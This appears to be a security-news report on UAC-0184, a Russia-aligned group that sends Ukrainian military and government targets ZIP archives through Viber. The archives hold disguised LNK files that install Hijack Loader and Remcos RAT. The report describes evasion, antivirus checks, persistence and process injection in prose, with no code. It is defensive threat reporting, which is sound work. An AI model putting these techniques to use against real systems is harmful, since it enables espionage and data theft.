Viber messaging platform has been used by the Russia-aligned threat actor known as UAC-0184 to distribute malicious ZIP archives to Ukrainian military and government entities. This threat actor has been spotted targeting Ukrainian military and government entities.
"This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025," the 360 Threat Intelligence Center stated in a technical assessment. " These activities have been ongoing since 2025."
The hacker gang, which is also known as Hive0156, is most recognized for its use of war-themed baits in phishing emails in order to deploy Hijack Loader in attacks that are directed against Ukrainian entities. Following that, the malware loader functions as a conduit for infections caused by Remcos RAT.
At the beginning of January 2024, CERT-UA was the first organization to document the threat actor. It has been discovered that subsequent assault campaigns make use of messaging applications such as Signal and Telegram as mediums for the distribution of malicious software. This strategy appears to have undergone additional development, according to the most recent findings from the Chinese security system vendor.
Viber is used as the initial intrusion vector in the attack chain, which consists of the distribution of malicious ZIP archives that contain several Windows shortcut (LNK) files that are disguised as authentic Microsoft Word and Excel documents in order to deceive recipients into opening them.
At the same time as Hijack Loader is being secretly executed in the background by retrieving a second ZIP package (named "smoothieks.zip") from a remote site using a PowerShell script, the LNK files are designed to send a fake document to the victim in order to reduce their level of suspicion.
By employing methods such as DLL side-loading and module stomping, the assault is able to circumvent detection by security solutions. This is accomplished through a multi-stage process that involves the reconstruction and deployment of Hijack Loader in memory. After that, the loader performs a search for installed security software in the environment. This search includes software associated with Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft. The loader does this by computing the CRC32 hash of the application that corresponds to the malware.
In addition to establishing persistence through the use of scheduled processes, the loader takes measures to circumvent static signature detection before secretly executing Remcos RAT by injecting it into "chime.exe." Attackers are granted the power to manage the endpoint, run payloads, monitor activity, and steal data through the use of the remote administration tool.
"Although marketed as legitimate system management software, its powerful intrusive capabilities make it frequently used by various malicious attackers for cyber espionage and data theft activities," according to the 360 Threat Intelligence Center's statement. "Through the graphical user interface (GUI) control panel provided by Remcos, attackers can perform batch automated management or precise manual interactive operations on the victim's host."
